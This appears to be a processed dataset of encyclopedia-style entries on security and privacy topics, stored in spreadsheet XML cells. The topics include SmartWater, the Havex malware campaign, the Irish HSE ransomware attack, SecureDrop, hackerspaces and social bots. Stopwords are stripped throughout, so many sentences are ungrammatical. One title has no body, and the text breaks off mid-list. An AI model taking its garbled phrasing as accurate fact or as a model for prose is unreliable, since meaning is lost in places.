    <t>smartwater traceable liquid forensic asset marking system (taggant) applied items value identify thieves deter theft. liquid leaves long-lasting unique identifier, whose presence invisible except ultraviolet black light. history smartwater, forensic technology company, started early 1990s phil cleary, british police officer served approximately years working various specialist departments leaving force start security company. brother mike cleary, chartered chemist fellow royal society chemistry, created smartwater. mike responsible development technology, whereas phil created deterrence business strategies. 1996, smartwater gained national profile clearys prince wales award innovation 'product commercial potential' bbc's tomorrow's world. composition smartwater consists liquid containing code, presence seen ultraviolet light. intended applied valuable items, stolen later recovered police, original owner determined laboratory testing sample. another application sprinkler system sprays burglar (invisible) fluid, lasts months, generate evidence connects suspect specific location. smartwater comes three variants, "index solutions", "indsol tracer" "smartwater instant", different techniques embed code. according phil cleary, allows "millions chemical signatures" and, terms asset protection system, identifier superior genetic fingerprinting dna.the "index solutions" variant water based solution containing level additives, blended using binary sequence ensure uniqueness. index solution contained within spray system activated intruder detection unit, similar burglar alarm, marks intruder spray, police locate using black (uv) light. "indsol tracer" variant polymer emulsion blends different chemical agents according binary code allowing billion different possibilities, stated company.the "smartwater instant" variant consists mainly copolymer vinyl acetate isopropyl alcohol. this fluid contains millions tiny fragments; unique number called "sin" ("smartwater identification number", registered national police database together owner's details) encoded particles. effectiveness speech security professionals birmingham 2006, phil cleary stated 'property marking initiatives waste time public money unless they're accompanied underlying strategy aimed creating sustainable deterrent'. cleary went suggest criminals would deterred technology unless successful track record securing convictions criminal courts. 2008, research paper published team professor martin gill, interviewed criminals asked whether presence smartwater would deter burglary, saying would. smartwater company developed crime reduction programme, called 'the smartwater strategy'. 2012, smartwater presented strategy officers metropolitan police, decided test smartwater's concept controlled conditions. consequently, 'proof concept' trial initiated 2013. smartwater operated london borough brent and, following months formal assessment, announced reduction household burglary.in 2017, smartwater became accredited compliant government's forensic science regulator's codes practice, became lawful requirement april 2021. evidence adduced court accredited risk ruled inadmissible. corporate history during period 2016 2019, smartwater started programme culminating acquisition systems prestwick, scotland created smartwater group limited, comprising smartwater technology limited, systems ltd, smartwater foundation centre infrastructure asset protection, company's intelligence provides crime pattern analysis police service. 2020, private equity house, freshstream, bought majority stake smartwater group limited, information filed companies house indicating valuation approximately £150m. founders mike cleary fully retired freshstream joined company phil cleary stayed eighteen months integration process, retiring december 2021. phil cleary awarded fellowship royal society arts 2009. also alphadot invisible perfluorocarbon tracer selectadna marking references external links official website</t>
  </si>
  <si>
    <t>Havex</t>
  </si>
  <si>
    <t>havex malware, also known backdoor.oldrea, employed russian attributed group “energetic bear” “dragonfly." havex discovered 2013 five known tailored malware developed past decade. these malwares include stuxnet, blackenergy, industroyer/crashoverride, triton/trisis. energetic bear began utilizing havex widespread espionage campaign targeting energy, aviation, pharmaceutical, defense, petrochemical sectors. campaign targeted victims primarily united states europe. discovery havex malware discovered cybersecurity researchers f-secure symantec reported ics-cert utilizing information firms 2013. ics-cert alert reported analyzing malware campaign targeting equipment several attack vectors using conduct reconnaissance industrial equipment target network. description havex malware primary components: server written php. havex also includes (open platform communications) scanning module used search industrial devices network. scanning module designed scan devices operating ports 44818, 502. researchers sans noted ports common ics/scada companies siemens rockwell automation. abusing protocol, havex mapped industrial networks inside victim systems. researchers note scanning module operated older dcom-based (distributed component object model) standard recent unified architecture (ua). havex joins category tailored malware written conduct information gathering specific systems. havex also exploited supply chain watering-hole attacks vendor websites addition spear phishing campaigns gain access victim systems. watering-hole supply chain attacks twofold methodology. first method, victims redirected legitimate vendor websites corrupted pages containing havex malware. second method, attackers compromised vulnerable vendor websites corrupted legitimate software inject havex rat. users would unknowingly download malware downloading otherwise legitimate software vendor websites. this method allowed malware bypass traditional security measure software downloaded users authorization install programs onto network. known compromised vendors mesa imaging, ewon/talk2m, connect line. while attack vectors aimed business networks, lack robust airgaps many environments could allow malware like havex jump easily business networks industrial networks infect ics/scada equipment. havex, like backdoor malwares, also allows injection malicious code onto victim devices. specifically, havex often used inject karagany payload onto compromised devices. karagany could steal credentials, take screenshots, transfer files dragonfly servers. affected regions victims dragonfly group utilized havex malware espionage campaign energy, aviation. pharmaceutical, defense, petrochemical victims primarily united states europe. cybersecurity researchers dragos estimated campaign targeted 2,000 sites regions sectors. researchers symantec observed havex malware began seeking energy infrastructure targets initially targeting canadian defense aviation sectors. through discovery process, researchers examined servers associated havex campaign variants malware. exploit kits website redirect injection havex infected systems watering hole attacks redirecting users malicious websites. corrupted websites campaign used lightsout hello exploit kits infect systems havex karagany trojans. lightsout exploit abused java browser vulnerabilities deliver havex karagany payloads. hello exploit updated version lightsout exploit came 2013. updated hello exploit uses footprinting determine target versions, fonts, browser add-ons, user information. once information gathered, exploit redirects victim malicious based efficient exploits gain access target. references</t>
  </si>
  <si>
    <t>Haystack (software)</t>
  </si>
  <si>
    <t>haystack never-completed program intended network traffic obfuscation encryption. promoted tool circumvent internet censorship iran. shortly release first test version, reviewers concluded software live promises made functionality security, would leave users' computers vulnerable. history haystack announced context perceived wave internet activism 2009 iranian election protests. there great deal hype surrounding haystack project. bbc's virtual revolution television series featured software context attempts bypass network blocking software iran. project composed programmer spokesperson. early project claims received manual describing iran's filtering software, written persian, iranian official.amidst criticism technologists, including jacob appelbaum danny o'brien, september 2010, washington post reported security concerns suspension testing haystack. message front page haystack site posted confirmed report, saying halted ongoing testing haystack iran pending security review. copy test program, please refrain using it." following reported news quoted stating source code application would released. shutdown resignation programmer project, daniel colascione, effectively ended development haystack project. project site defunct. references</t>
  </si>
  <si>
    <t>Security Device Event Exchange</t>
  </si>
  <si>
    <t>security device event exchange (sdee) standard proposed international computer security association specifies format messages protocol used communicate events generated security devices. this protocol used cisco systems sensor replace remote data exchange protocol (rdep), used earlier versions cisco sensor. external links icsa labs consortium announces network intrusion detection system alert specification format february 2004, business wire icsa labs announces security device event exchange (sdee) march 2004, richard bejtlich cisco intrusion detection event exchange (cidee) specifies extensions security device event exchange (sdee)</t>
  </si>
  <si>
    <t>Security BSides</t>
  </si>
  <si>
    <t>security bsides (commonly referred bsides) series loosely affiliated information security conferences. co-founded mike dahn, jack daniel, chris nickerson 2009. overwhelming number presentation submissions black 2009, rejected presentations presented smaller group individuals. over time conference format matured released enable individuals start bsides conferences. there three event styles, structured, unconference, hybrid. structured event follows traditional conference model often happens tandem larger conferences black hat, rsa, etc. attendees typically intermingle attend events. talks submitted local event ahead time, selected, scheduled prior start conference. unconference event style completely attendee driven. attendees appear predetermined time, discuss ideas, collaboratively agree upon schedule look like day. talks attention conversation added schedule. also hacker conference kiwicon summercon references external links official website unconference</t>
  </si>
  <si>
    <t>Health Service Executive ransomware attack</t>
  </si>
  <si>
    <t>2021, health service executive (hse) ireland suffered major ransomware cyberattack caused systems nationwide shut down.it significant cybercrime attack irish state agency largest known attack health service computer system. bloomberg news reported attackers used conti ransomware. group responsible identified criminal gang known wizard spider, believed operating russia. group believed attacked department health similar cyberattack. may, financial times reviewed private data twelve individuals appeared online result breach. may, confirmed confidential medical information patients, well corporate documents published online.on june, confirmed least three quarters hse's servers decrypted computer devices back use. september, servers devices restored. background attackers began sending malicious email workstation march 2021. email opened march. malicious microsoft excel file downloaded, allowed attackers access systems. attackers gained access following weeks. antivirus software detected activity march, could block monitor mode.on cybersecurity provider emailed security operations team unhandled threats least systems since may. security operations team server team restart servers.the alerted attack 2021. attack affected national local systems, involved core services, taking system order protect attack give time consider options.the attack occurred covid-19 pandemic. ireland's covid-19 vaccination programme affected attack proceeded planned; however, covid-19 general practitioner close contact referral system down, requiring individuals attend walk-in sites rather attend appointment.the independent (member parliament) cathal berry stated national cyber security centre responsible state's cyber security, members staff, budget million year, dedicated premises, position director vacant year salary €89,000 year. national cyber security centre remit department environment, climate communications. perpetrator methodology national cyber security centre identified penetration testing tool cobalt strike, sold american company helpsystems, used move infect department health systems, executable files, deploy variant conti ransomware. cobalt strike beacon detected infected systems, allowed controlled software deployed remotely.the group responsible identified criminal gang known wizard spider, believed operating saint petersburg, russia. impact ransomware cyber attack significant impact hospital appointments across country, many appointments cancelled including outpatient radiology services.several hospitals described situations could access electronic systems records rely paper records. some warned significant disruption routine appointments cancelled, including maternity checkups scans.the covid-19 testing referral system made offline, requiring individuals suspected cases attend walk-in covid-19 testing centres, rather attend appointment. covid-19 vaccination registration portal also made offline, later back online evening.the chief operations officer anne o'connor said cancer stroke services affected "the situation serious continues monday may]". said serious concerns diagnostics, radiology systems gone down, affecting scans going ahead. large amount out-patient appointments also cancelled; community health services unaffected. o'connor also reported know data taken", know data compromised", data protection commissioner alerted potential breach.the published list affected services website lunchtime 2021.on may, financial times reviewed "samples" private data twelve individuals published online, including admission records laboratory results admitted hospital palliative care. response, national cyber security centre stated criminal gangs "habitually release stolen information means pressurising organisations paying ransom". contilocker team claimed also staff employment contracts, payroll data financial statements, patient addresses, patient phone numbers.on may, confirmed data relating patients, including sensitive information, published online. hospital disruptions december 2021 said take four months contact whose data stolen. garda national cyber crime bureau received data united states department justice mutual legal assistance treaty. bureau provided data december 2021. confirmed said data taken computers. also contacted data protection commissioner data. data expected personal data, medical information, corporate information well commercial general personal administrative information. response working national cyber security centre, garda síochána, irish defence forces, well various partners domestically internationally, including europol interpol.the minister state public procurement egovernment ossian smyth said attack international, espionage, "this significant attack, possibly significant cyber attack irish state."the claimed zero-day-threat experience respond attack. minister health stephen donnelly said attack severe impact" health social care services. director-general paul reid said attack cost "tens millions" fix.a number news outlets, including bleeping computer, reported ransom figure €16.5 million (about million) made, offering decrypt data publish "private data". initially, business post reported ransom demand three bitcoin €124,000 (about $150,000) made. taoiseach micheál martin stated ransom would paid, attack instead dealt "methodical way".american cybersecurity firms mcafee fireeye contracted attack mitigate damage, monitor dark sites leaked data.on may, reported department social protection came "sustained fierce attack" highly-organised criminal group unable breach security. department subsequently suspended electronic communication channels hse.on may, minister communications eamon ryan said helpline assist individuals health information published result hack, social media companies asked share information released, high court injuction obtained prohibit sharing information. day, reported organised cyber crime group provided decryption could enable recover systems files hackers locked encrypted. meanwhile, public advised gardaí aware number call text scams wake cyber attack amid warnings delivery care health service would high risk weeks; may, garda síochána described calls threatening release information "opportunistic", stating access private data.on may, chief executive paul reid said cost cyber attack systems could exceed €100 million.the defence forces' corps deployed 'ethical hackers' fight back ransomware attack sent personnel hospitals offices order decrypt devices affected onsite. army reservists particularly useful effort cybersecurity skills experienced gleaned private sector jobs.on september, major operation carried gardaí targeting gang behind ransomware attack, garda national cyber crime bureau seized several domains used cyberattack ransomware attacks. pricewaterhousecoopers report december report pricewaterhousecoopers released revealed attackers computer systems eight weeks attack initiated. report said legacy system resilient cyberattacks. evolved time designed resist attacks.hse paul reid said system strategically designed, result amalgamation health boards, hospital groups community healthcare organisations. system fragmented siloed. contrast, staff described resilient, working quickly ensure continuity services. reid also said initiated number actions mitigate future attacks. these include hour monitoring system systems multi-factor authentication users.hse chairman ciarán devine said heath service still feels impact attack.the accepted number recommendations report, including development significant investment plan transforming legacy include security.new roles chief technology transformation officer chief information security officer created.the report also recommends security crisis management plans ensure responses futures attacks properly managed.the ethical hackers test system security increased. department health cyberattack may, national cyber security centre (ncsc) alerted "suspicious activity" department health systems, morning attempt ransomware prevented, department health systems shut precaution. preliminary investigation ncsc showed remote access tool cobalt strike, sold american technology company helpsystems, infect systems execute ransomware payload.according news, digital note cyber crime group believed responsible left department's systems, similar discovered hse. restoration systems june 2021, confirmed least three quarters hse's servers decrypted computer devices back use. july, risen servers devices. september, servers devices restored. legal action june 2021, high court judge tony o'connor told approximately files stolen placed malware analysis service virustotal late may. virustotal owned chronicle security ireland ltd, parent chronicle ultimately google. stolen files included confidential patient information downloaded times files removed may.the defendants chronicle security ireland chronicle said wanted help much possible, data protection reasons cannot hand material unless court orders them. therefore, sought norwich pharmacal orders defendants require provide information uploaded downloaded stolen information. orders would require defendants supply unknown users' email addresses, phone numbers, addresses physical addresses.the hse's national director operation performance integration ryan said became aware financial times published article referring stolen data mentioning link stolen data. sought return stolen data explanation link location financial times indicated received information confidential source refused reveal.on 2021, obtained court order restraining processing, publishing, sharing selling stolen data. when financial times received copy order, handed information source computer security advisers. analysis material revealed stolen data uploaded virustotal.ryan said contacted, defendants deleted stolen data servers.counsel told judge matter urgent hoped matter could finalised matter next comes court. defendant's lawyers said unlikely oppose order agreed form disclose information. judge, parte basis, granted counsel permission serve short notice proceedings defendants resumed matter following week. also colonial pipeline cyberattack wannacry ransomware attack affected national health service (nhs) united kingdom waikato district health board cyberattack references external links conti cyber attack independent post incident report (redacted)</t>
  </si>
  <si>
    <t>SecureDrop</t>
  </si>
  <si>
    <t>securedrop free software platform secure communication journalists sources (whistleblowers). originally designed developed aaron swartz kevin poulsen name deaddrop. james dolan also co-created software. history after aaron swartz's death, first instance platform launched name strongbox staff yorker 2013. freedom press foundation took development deaddrop name securedrop, since assisted installation several news organizations, including propublica, guardian, intercept, washington post. security securedrop uses anonymity network facilitate communication whistleblowers, journalists, news organizations. securedrop sites therefore accessible onion services network. after user visits securedrop website, given randomly generated code name. this code name used send information particular author editor uploading. investigative journalists contact whistleblower securedrop messaging. therefore, whistleblower must take note random code name.the system utilizes private, segregated servers possession news organization. journalists flash drives personal computers access securedrop data. first personal computer accesses securedrop network, journalist uses first flash drive download encrypted data secure drop server. second personal computer connect internet, wiped reboot. second flash drive contains decryption code. first second flash drives inserted second personal computer, material becomes available journalist. personal computer shut use.freedom press foundation stated securedrop code security environment audited independent third party every major version release publish results. first audit conducted university washington security researchers bruce schneier. second audit conducted cure53, german security firm.securedrop suggests sources disabling javascript protect anonymity. prominent organizations using securedrop freedom press foundation maintains official directory securedrop instances. this partial list instances prominent news organizations. awards 2016: free software foundation, free software award, award projects social benefit also globaleaks wikileaks references external links securedrop.org securedrop github securedrop freedom press foundation</t>
  </si>
  <si>
    <t>Hard privacy technologies</t>
  </si>
  <si>
    <t>hard privacy technologies methods protecting data. hard privacy technologies soft privacy technologies fall category privacy enchancing technologies. hard privacy technologies allow online users protect privacy different services applications without trust third-parties. data protection goal data minimization reduction trust third-parties freedom (and techniques) conceal information communicate. applications hard privacy technologies include onion routing, vpns secret ballot used democratic elections. systems anonymous communications networks networks cryptography permutations provide anonymity communications. combination makes monitoring end-to-end communications challenging eavesdroppers, since breaks link sender recipients. dining cryptographers (dc-net) dc-net protocol communication enables secure, uninterrupted communication. round-based protocol enables participants publish message round unobservably. integrated services digital network (isdn) isdn based digital telecommunications network, i.e. digital kbit/s channel network. isdn primarily used swapping networks; therefore offers effective service communication. attacks anonymous communications order cope attacks anonymity systems, traffic analysis would trace information talking whom, extract profiles traffic analysis used vanilla hardened systems. examples hard privacy technologies onion routing onion routing internet-based encrypted technique prevent eavesdropping, traffic analysis attacks messages onion network embedded encryption layers. destination layer encrypted. router, message decrypted private unveiled like 'onion' message transmitted next router.tor free-to-use anonymity service depends concept onion routing. among pets, highest user bases. vpns virtual private network(vpn) important ways protect personal information. connects private network public network, helps users share information public networks extending computer devices. thus, vpns users benefit security. future hard privacy technology future hard privacy technology include limited disclosure technology data protection disclosure legislation.limited disclosure technology offers mechanism preserve individuals' privacy encouraging provide information little sufficient complete interactionor purchase service providers. this technology restrict data sharing consumers third parties.data protection disclosure legislation. although united states general federal legislation data privacy policy, range federal data protection laws sector-related focus specific data forms. example, children online privacy protection (coppa) u.s. code section 6501) forbids collection information child years internet digitally linked devices. video privacy protection u.s. code 2710 seq.) restricts release video rental sale records, including online streaming. last, cable communications policy 1984 code 551) protects subscribers' information privacy. linddun methodology linddun short seven categories privacy threats including linkability, recognition, non-repudiation, sensitivity, leakage details, unconscionability non-compliance. used privacy threat modeling methodology supports analysts systematically eliciting mitigating privacy threats software architectures. main strength combination methodological guidance privacy knowledge support. references</t>
  </si>
  <si>
    <t>Hackerspace</t>
  </si>
  <si>
    <t>hackerspace (also referred hacklab, hackspace, makerspace) community-operated, often "not profit" (501(c)(3) united states), workspace people common interests, computers, machining, technology, science, digital art, electronic art, meet, socialize, collaborate. hackerspaces comparable community-operated spaces similar aims mechanisms lab, men's sheds, commercial "for-profit" companies. history hackerspaces open membership became common throughout germany 1990s orbit german chaos computer club (ccc), c-base probably example. concept, however, limited less dozen spaces within germany, spread beyond borders first. most likely initial founding costs prohibitive small groups without support large organization like ccc. from 1997, chicago's autonomous zone infoshop hosted "unscrew early hacking repair program weekly. 2006 paul böhm came fundraising strategy based street performer protocol build metalab vienna, austria, became founding director. 2007 others started hackerspaces.org, wiki-based website maintains list many hackerspaces documents patterns start them. september 2015 community list included 1967 hackerspaces 1199 active sites planned sites.the advent crowdfunding kickstarter (founded 2009) tools required build hackerspaces within reach even wider audience. example, bilal ghalib (who previously worked hackerspace documentary) others used tools bring hackerspace concept middle east.worldwide, large number hackerspace makerspace facilities founded. nicole katie peek reported 2006 2016 number active planned spaces increased 1,393, fourteen times many 2006.the federal government started adopting concept fully open makerspaces within agencies 2015, first (spaceshop rapid prototyping lab) resides nasa ames research center. activities general, hackerspaces function centers peer learning knowledge sharing, form workshops, presentations, lectures. they usually also offer social activities members, game nights parties. hackerspaces viewed open community labs incorporating elements machine shops, workshops, and/or studios hackers come together share resources knowledge build make things.many hackerspaces participate development free software, open hardware, alternative media. they often physically located infoshops, social centers, adult education centers, public schools, public libraries, university campuses, relocate industrial warehouse space need room. most recent studies hackerspace china—where internet access heavily censored—suggest businesses organized tech conferences serve intervene status "from within". first hackerspace china, xinchejian, opened shanghai 2010. thereafter network hackerspaces emerged, nourishing emerging maker culture. designing open technologies developing businesses, chinese makers make system, make altering provoking makers often bring align contradictory ideas together, copycat open source, manufacturing diy, individual empowerment collective change. craft subject position beyond common rhetoric chinese citizens lack creativity. site individual empowerment, hackerspace making enable people remake societal norms material infrastructures undergird work livelihood. facilities specific tools resources available hackerspaces vary place place. they typically provide space members work individual projects, collaborate group projects members. hackerspaces also operate computer tool lending libraries, physical tool lending libraries, including creative toys instances.the building facility hackerspace occupies provides physical infrastructure members need complete projects. addition hackerspaces provide electrical power, computer servers, networking internet connectivity. well-equipped hackerspaces provide machine tools, sewing, crafting, fabrication, audio equipment, video projectors, game consoles, electronic instrumentation (such oscilloscopes signal generators), electronic components materials hacking, various tools electronics fabrication creating things. specialized large-format printers, printers, laser cutters, industrial sewing machines, water cutters available members use. some hackerspaces provide food storage food preparation equipment, teach courses basic advanced cooking. organization individual character hackerspace determined members. there variety hackerspaces organised. some hackerspaces governed elected boards selected active members good standing. elected officers serve predetermined terms, help direct decision-making regards purchasing equipment, recruiting members, formulating policy, conforming safety requirements, administrative issues. london hackspace, example, governed elected board trustees. others, open garage, single benevolent dictator life (bdfl). this common governance structure hackerspaces founded single person property. there also anarchist governance models do-ocracy, people receive authority task this model often combined structures elected boards consensus-driven meetings, case noisebridge.membership fees usually main income hackerspace, also accept external sponsors. some hackerspaces 501(c)3 status equivalent jurisdiction), others chosen forgo exempt status. university-affiliated hackerspaces often charge explicit fee, generally limited students, staff, alumni, although visiting guests hackerspaces usually welcome. some hackerspaces accept volunteer labor lieu membership fees, especially financially limited participants. addition, hackerspaces earn income sponsoring staffing high-tech flea markets, members general public sell used equipment supplies. there loose, informal tradition many hackerspaces welcoming visitors similar organizations, whether across town internationally. free exchange ideas, skills, knowledge encouraged, especially periodic gatherings sometimes called "build nights" "open house" days. hackerspaces makerspaces increasingly included learning spaces schools, learning commons, educational facilities. ethic hackerspaces widely defined hackerspaces.org “community-operated physical places, people meet work projects”. exact functioning space varies place place determined members blueprint guidelines create hackerspace, generally follow “hacker ethic”, “include freedom, sense autonomy well free access circulation information; distrust authority, opposing traditional, industrial top-down style organization; embracing concept learning peer-to-peer learning processes opposed formal modes learning; sharing, solidarity cooperation”.hackerspaces also described physical manifestations peer production principles. equity justice-centered making large opportunity gaps science engineering (stem) persist youth growing poverty, particular african american latino youth, become focus stem-rich making. evolving maker movement generated interest potential role opening access learning attainment stem, advocates arguing “democratizing effects" access makerspace, “anyone make… anyone change world”. makerspaces potentially offer opportunities young people engage stem knowledge practices creative playful ways, “learning making”.however, explicit equity-agenda fairly absent maker movement, especially relates sustained engagement making. movement remains adult, white, middle-class pursuit, leisure time, technical knowledge, experience, resources make. even growth community-based makerspaces, users spaces tend white adult men. median salary involved maker movement $103,000, maker faires college degrees (and graduate degrees). only contributions make magazine (the periodical credited launching maker movement) female. thus, maker movement become formalized, powerful knowledge practices communities color low-income communities become central discourse.emerging research begun address maker movement might address equity concerns broadly. there recent research area, challenging field consider directions design maker spaces, maker space programming pedagogies, make sense outcomes making. these include: expanding counts making; design makerspaces foster open, flexible welcoming atmosphere youth; maker space programs pedagogies support equitable culture making, incorporation participants’ cultural knowledge practices, focus literacies; valuing multiple iterations failing-forward; expanding outcomes making include agency, identity, after-life maker projects. cutting across areas specific attention gender computer science, indigenous epistemologies maker activities, makerspaces ground stem-rich making lived experiences wisdom youth color families communities.one emerging area studies examines production equitable culture making, including in-depth longitudinal cases youth makers community settings, youth community co-design equitable learning opportunities outcomes. difficulties critique hackerspaces difficulties building codes planning regulations, designed handle scope activities. example, hackerspace nashua, hampshire, shut city inspection 2011. main issues involved ventilation heat toxic fumes; space reopened improvements made building.the difficulties opening hackerspaces makerspaces within non-profit organizations, schools public libraries include cost, space, liability, availability personnel. many makerspaces struggle sustain viable business models support missions.hackerspace culture demonstrable challenges spaces themselves. more, see: maker culture#criticisms.in 2009, johannes grenzfurthner published much debated pamphlet "hacking spaces", dealt exclusionist tendencies hackerspaces movement. grenzfurther extended critique lectures 2012 2014 hackers planet earth conferences york city. notable hackerspaces over years, many hackerspaces grown significantly membership, operational budgets, local media attention. many also helped establish hackerspaces nearby locations. "the loft" hackerspace 1992-2002 downtown diego anarchic center young underground tech, music, communities seeking creative outlet conservative military town. space large, well equipped, loosely operated. c-base (1995) berlin recognized first independent, stand-alone hackerspaces world, affiliated school, university, company. wired writes "european groups, particularly germany, long tradition kind activity". another known german hackerspace raumzeitlabor, organizer trollcon. geek group, formed 1994, budding nonprofit hackerspace grand rapids, michigan large following internet presence. there various chapters around united states. their main focus opensource hackerspace increase stem education accessibility become accredited institution higher education. metalab, founded 2006, generally considered pioneered funding principles enabled rapid spread concept. techshop first chain commercial hackerspaces. launched october 2006. october 2012, techshop locations three california north carolina, michigan, texas, last partnership lowe's home improvement chain. 2019, company declared bankruptcy, plans reorganization liquidation announced. august 2007, group north american hackers visited europe sense potential european 'hacker spaces'", upon return, groups resistor hacdc late 2007, noisebridge following fall 2008. revspace dutch hackerspace founded 2009. regular channel perpetrated ddos attack visa mastercard 2010. dallas makerspace (dms) founded members dallas personal robotics group (dprg) 2010. summer 2017, paying membership base 1500, "making largest, largest, nonprofit, volunteer-run makerspaces country" according dallas morning news. first chinese hackerspace xinchejian established shanghai fall 2010. thereafter hackerspaces grown numerous cities including beijing, shenzhen, ningbo, hangzhou guangzhou. chinese makers became internationally visible first maker carnival hosted beijing 2012. city innovations community-based maker space lansing michigan, youth work year-round design prototype stem-rich making solutions local community concerns. program free open youth community center, foregrounds youth's rich cultural knowledge wisdom making efforts. columbus idea foundry moved 65,000-square-foot factory columbus ohio 2014. account, "the country's largest space". nasa ames spaceshop rapid prototyping developed first open makerspace within federal government. located nasa ames research center, facility trained thousands federal employees emerging rapid-prototyping equipment. artisan's asylum (somerville, massachusetts), believed largest makerspace world. verstehbahnhof fürstenberg (havel) station example makerspace rural german town declining population. daniel domscheit-berg principal contributors space. variations places share values similar purported hackspaces, whether nomenclature. examples follow: public library hackerspaces public libraries long place share resources learning. lately reconsidered roles include providing resources hacking making. those generally call library makerspaces. example, chattanooga's floor first library laboratory playground community. user experience (ux) another public laboratory educational facility. according forbes, first public library open makerspace fayetteville free library. men's sheds there 1,000 active men's sheds australia, scotland, england, ireland, finland, greece, 2012. instead seeing "hackers" describe "shedders" activities "shedding". men's sheds movement many ways parallel hackerspaces aims; although open anyone regardless gender, tend advertise "men sheds". ways seen flip side working men's clubs, community drawn similar group original aims similar: provide recreation education working class families. feminist hackerspaces response misogyny allegedly shown brogrammer culture sees hackerspaces "male" spaces, seattle attic founded summer 2013, first feminist hackerspace united states. they soon followed double union, francisco. their founding came result initiative, adacamp conferences. which also formation foufem montreal, baltazar's laboratory, start-up organization feminist hackspace vienna, anarchafeminist hackerhive francisco, hacktory philadelphia miss despionas tasmania, australia, myriad others. public school maker/hackerspaces some public schools also include hackerspaces. first high school open true makerspace sebastopol, california, middle schools followed trend. example, white hill middle school fairfax, california opened makerspace class called "makers hackers". 2018 penketh high school became first school school makerspace united kingdom. "spark" designed students community first kind uk.in shenzhen, china steamhead makerspace organized school makerspace inside shenzhen american international school 2014, makerspace organized school makerspace inside harbour school. labs labs spaces (part network initiated mit's center bits atoms) whose goal enable people "make (almost) anything". they focus heavily digital fabrication tools. community spaces there many community spaces share values hackerspaces. some, like as220 haystack mountain school crafts embraced structures expand range media represented spaces include digital fabrication tools. there also community-based makerspaces focused open-access allow community members address community-based problems. from justice perspective, open access important many makerspaces pay-to-play. examples community-based making spaces include city elliot, michigan. university maker/hackerspaces universities around world different rates embraced educational possibilities spaces. makerspaces provide colleges universities inspirational environment innovative connections technology curriculum utilized experiential teaching learning activities pioneered movement implementation similar spaces universities around world. non-fab-lab-associated maker hackerspaces also common. wheaton college school pioneering hacker maker curriculums spaces, yale university spaces like "ceid". franklin olin college engineering also pioneered makerist hacker curriculum great success. bioengineering department university pennsylvania's school engineering applied science combines educational space open bio-makerspace george stephenson foundation educational laboratory bio-makerspace biomakerspace biomaker space), encouraging free flow ideas, creativity, entrepreneurship bioengineering students students throughout university. william mary rapidly expanding makerspace resources include engineering spaces undergraduate graduate degrees part coll curricula. tool library tool libraries generally lack shared space making hacking things, instead serve repository tools people borrow respective spaces. repair cafe clinic "repair cafés" semipermanent places people come together teach learn things. "repair clinics" pop-up events without permanent facilities, though often sponsored organizations public libraries, schools, universities. emphasis basic repairs rather building things, similar informal atmosphere exploration learning skills. bicycle coops bicycle cooperatives places people build bicycles. cooking makerspace place anyone different professional kitchen equipment culinary experiments. also hacker culture hackerspace global grid maker culture maker faire tinkering school references external links hackerspacewiki global hackerspace database resource</t>
  </si>
  <si>
    <t>HackerspaceSG</t>
  </si>
  <si>
    <t>hackerspacesg 1,202-square-foot (111.7 technology community center hackerspace singapore. predominantly open working space software projects, hackerspacesg hosts range events technology classes biology, computer hardware, manufacturing open types hackers. organisation hackerspacesg not-for-profit membership organisation, many chores activities performed self-directed member volunteers. organisational decisions proposed discussed monthly plenums, decided mostly consensus. board handles administration government-mandated filings. organisation open membership: anybody become member. primarily financed membership dues, open accepting party sponsorships fund expansions renovations. culture hackerspacesg entirely communal space, tools electronics lab, desks, food refrigerator. anything left space considered fair game anybody play with. very restrictions placed upon people, long detract experience members consume resources replace. member host event space. physical space hackerspacesg originally located bussorah street singapore. 2-year lease extended once, october 2013, landlord expressed desire develop bussorah street unit distinct units. this meant members would endure dust noise, unlikely units would leased back hackerspacesg existing rates lease renewed.it decided hackerspacesg would move out. search location commenced months october november, membership finally settling 344b king george's avenue. lease signed november 2013, move-in occurred next day. november 2021, hackerspacesg moved different unit king george's building. uses three primary uses hackerspacesg events, coworking space, social purposes. intersection three uses hackerspacesg hopes make consistently nice place good place meet people, place challenged intellectually. events hackerspacesg hosts tech meetups monthly hack tell. members host events hackerspacesg free charge, subject approval hackerspacesg events committee. coworking number singapore startups independent developers work daily hackerspacesg primary location. notable businesses hackerspacesg history viki social hackerspacesg also movie game nights. references external links hackerspace.sg "the official hackerspacesg google group" "what seattle, silicon valley, berlin cambridge (both cambridges) have common?". e27. october 2009 "co-workers world, unite hackerspace.sg". tech asia. october 2009 "developing 'hacker' culture ideas, innovation". zdnet. november 2010. "high-tech tinkerers rise" straits times. 2011.</t>
  </si>
  <si>
    <t>Hacking (computer security)</t>
  </si>
  <si>
    <t>Social bot</t>
  </si>
  <si>
    <t>social agent communicates autonomously social media. messages (e.g. tweets) distributes simple operate groups various configurations partial human control (hybrid). social bots also artificial intelligence express messages natural human dialogue. uses influence peoples decisions, e.g.: advertise product, support political campaign, increase engagement statistics social media pages, etc. provide cost customer service agent answer questions users might have. automatically answers commonly asked questions social media discord.lutz finger identifies five immediate uses social bots: foster fame: arbitrary number (unrevealed) bots (fake) followers help simulate real success spamming: advertising bots online chats similar email spam, direct. mischief: e.g. signing opponent fake identities spam account help others discover discredit opponent. bias public opinion: influence trends countless messages similar content different phrasings. limit free speech: important messages pushed sight deluge automated messages. phish passwords personal data. history social bots, besides able (re-)produce reuse messages autonomously, also share many traits spambots respect tendency infiltrate large user groups. twitterbots already well-known examples, corresponding autonomous agents facebook elsewhere also observed. nowadays, social bots equipped generate convincing internet personas well capable influencing real people. using social bots terms service many platforms, twitter instagram, although allowed degree others, reddit discord. even social media platforms restrict social bots, certain degree automation course intended making social media apis available. social media platforms also developed automated tools filter messages come bots, although advanced enough detect messages.the topic legal regulation social bots becoming urgent policy makers many countries, however difficulty recognizing social bots separating "eligible" automation social media apis, currently unclear done also enforced. case, social bots expected play role future shaping public opinion autonomously acting incessant never-tiring influencer. russian disinformation campaigns social bots used russian government spreading misinformation destabilize west, weaken nato allies more. 2014 russia used social bots spread misinformation invasion crimea 2022 invading ukraine convince people invasion good ukrainian people. 2016 presidential election social bots appear played significant role 2016 united states presidential election history appears back least united states midterm elections, 2010. estimated 9-15% active twitter accounts social bots total twitter population active presidential election discussion bots. least 400,000 bots responsible million tweets, roughly total volume. boston marathon bombings social bots used early detection critical events boston marathon bombings, although unverified sharing information others diminish positive use. detection first generation bots could sometimes distinguished real users often superhuman capacities post messages around clock (and massive rates). later developments succeeded imprinting "human" activity behavioral patterns agent. unambiguously detect social bots are, variety criteria must applied together using pattern detection techniques, are: cartoon figures user pictures sometimes also random real user pictures captured (identity fraud) reposting rate temporal patterns sentiment expression followers-to-friends ratio length user names variability (re)posted messages engagement rate (like/followers 